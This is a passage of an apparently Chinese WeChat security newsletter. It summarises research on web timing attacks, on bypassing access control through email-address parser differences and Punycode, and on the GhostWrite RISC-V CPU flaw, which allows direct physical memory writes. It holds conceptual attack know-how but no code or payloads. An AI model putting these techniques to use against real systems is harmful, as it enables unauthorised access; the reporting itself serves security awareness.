	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">揭秘：有效的网页计时攻击白皮书发布</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">网络计时攻击：利用 JSON 错误实现超高速响应</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPHGUufqm8XRgvkOHtnq4UFokIib0dlHbOQgRqKlLC7iapwGiasQXURgUrA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPHGUufqm8XRgvkOHtnq4UFokIib0dlHbOQgRqKlLC7iapwGiasQXURgUrA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855188448258451"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">定时攻击的实用性：网络定时攻击不再是理论上的威胁，而是一个实际可行的攻击手段，可以在野外环境中准确地检测到服务器的隐藏问题。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">定时攻击的普遍性：服务器上存在大量的定时信息泄露漏洞，这些漏洞普遍存在于现代网站中，且往往被忽视。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">定时攻击的进步：随着技术的进步，如HTTP/2协议的应用和单包攻击技术的发展，定时攻击变得更加精确和高效。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">定时攻击的多样性：定时攻击可以用于发现多种类型的安全问题，包括但不限于隐藏参数、注入漏洞、错误配置和反向代理漏洞。</section></li></ul>
	<br/>
	<p>🏷️: 网络攻击, 服务器安全, 漏洞利用</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 利用电子邮件解析漏洞绕过访问控制</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;"></span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" data-w="114" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=74729d03&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPVMeIVec65rqmQCEvlrBUK8qTdm960MbKkR4c5NvO6RoYsRntCFhDQQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.4797872340425532" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="940" src="https://wechat2rss.xlab.app/img-proxy/?k=5670fb08&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPSWoGrVepumsgQbdlibibKOUSFrt5WkdIRluiaS2UO2pFnaxnIm0UHpfmw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5557692307692308" data-w="1040" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=5eafa839&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPD6mUJI1dFbDmbNTMibhkia4rvnRyHkH3J16lwsp75CcL5Z66wtZSql4A%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">电子邮件地址RFC规范：为何不应遵循？</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用解析器漏洞绕过访问控制：拆解邮件原子</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPuvyqlTRVAgeT9k1zsqnkjXKOHjuthCAWMmeZ01V4cFwFVkUibNPECaw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPuvyqlTRVAgeT9k1zsqnkjXKOHjuthCAWMmeZ01V4cFwFVkUibNPECaw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844188228248488"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">电子邮件解析的复杂性：电子邮件地址的格式由多个RFC规定，这些规定过于宽松，导致解析变得复杂，容易出现差异。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">解析器差异的利用：不同的电子邮件解析器可能会对同一电子邮件地址进行不同的解析，这种差异可以被恶意利用来绕过访问控制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">编码单词和Punycode的风险：电子邮件地址中的编码单词和Punycode可以被用来欺骗解析器，产生不可见的字符或者伪装成其他域名。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">访问控制的脆弱性：依赖电子邮件域名进行访问控制是不安全的，因为攻击者可以通过各种技术来伪造或操纵电子邮件地址。</section></li></ul>
	<br/>
	<p>🏷️: 电子邮件安全, 访问控制, 漏洞利用</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 GhostWrite漏洞利用演示</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">GhostWrite 是 RISC-V 架构下的 T-Head XuanTie C910 CPU 中的一个硬件缺陷，该缺陷允许未授权的攻击者直接写入物理内存，绕过操作系统的进程隔离，导致设备安全性受到严重威胁。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.7853403141361257" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="191" src="https://wechat2rss.xlab.app/img-proxy/?k=9d3722f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2F98Nz5LFElxzdExAnJcAwRGbKicicibt9U9Ca8XnQbt4A1B3nknOq3llJ5L54E1bsriaejz4Jkm13BAdya9dR8zYwK3o0WOv9NRbj%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.8524945770065075" data-w="461" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=3018090d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2F98Nz5LFElxzdExAnJcAwRGbKicicibt9U9CicLXTFfZgmnz8TKSDTJrfAhgLTor9rzgug8x8LJkRUibEQB9vmbIM4VtibibRmCAPQJN%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="1" data-w="378" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=30ce03b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2F98Nz5LFElxzdExAnJcAwRGbKicicibt9U9CZxyqDgag5bJwXJRkjtibkw6WmULTwiaHyXVvLFiaNNpoS02yKRkj2dFDHrnYrkiamfDO%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:阿里巴巴 玄铁 CPU 被干了？直接cpu漏洞逃逸虚拟机</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">GhostWrite CPU 漏洞：打破隔离边界，影响 RISC-V 处理器</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPyUP5IDzZic09SWnjwaBtDicIw5eehSwOzcpT2s86cWMbeL1xQxuORf0g/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPyUP5IDzZic09SWnjwaBtDicIw5eehSwOzcpT2s86cWMbeL1xQxuORf0g/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844188228145118"></mp-common-miniprogram>
	</section>
